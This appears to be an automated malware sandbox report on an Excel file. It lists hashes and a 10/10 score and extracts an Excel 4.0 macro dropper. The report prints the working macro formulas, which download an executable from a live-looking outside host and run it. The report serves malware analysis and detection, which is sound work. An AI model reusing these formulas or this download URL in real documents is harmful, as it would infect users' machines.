General

  • Target

    c10db36f5a07bd13703226344b43cc1c_JaffaCakes118

  • Size

    106KB

  • Sample

    240825-s4dtns1gng

  • MD5

    c10db36f5a07bd13703226344b43cc1c

  • SHA1

    e67cf3ac54881bb4791e903426c3161e50249339

  • SHA256

    c0381b65a09796156de7dfc69e48cd0d16d67a27ced3fd15bc0c86c8d0f97b75

  • SHA512

    c87b70bafa17afddc7cd57c203ef0f93b65223d091507ce509601cb786af19d4475750f65f25bdd0829ed5f86bd0895c13fefd24a89eda13c075ffcf308a7e1f

  • SSDEEP

    1536:nSyEBMOZoVhoy9kKpA6gLc1aeWLXri6m7wBGozFDCTIuYDFo6QzXGfOiLdvkQJY:NOcoy2KpMXrit74lzFOTIT9QGfOiu

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://toliku.com/qmzo.exe

Attributes
  • formulas

    =CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://toliku.com/qmzo.exe","C:\ProgramData\cswzqQf.exe",0,0) =CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\ProgramData\cswzqQf.exe",,0,0) =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://toliku.com/qmzo.exe

Targets

    • Target

      c10db36f5a07bd13703226344b43cc1c_JaffaCakes118

    • Size

      106KB

    • MD5

      c10db36f5a07bd13703226344b43cc1c

    • SHA1

      e67cf3ac54881bb4791e903426c3161e50249339

    • SHA256

      c0381b65a09796156de7dfc69e48cd0d16d67a27ced3fd15bc0c86c8d0f97b75

    • SHA512

      c87b70bafa17afddc7cd57c203ef0f93b65223d091507ce509601cb786af19d4475750f65f25bdd0829ed5f86bd0895c13fefd24a89eda13c075ffcf308a7e1f

    • SSDEEP

      1536:nSyEBMOZoVhoy9kKpA6gLc1aeWLXri6m7wBGozFDCTIuYDFo6QzXGfOiLdvkQJY:NOcoy2KpMXrit74lzFOTIT9QGfOiu

    Score
    10/10

MITRE ATT&CK Enterprise v15

Tasks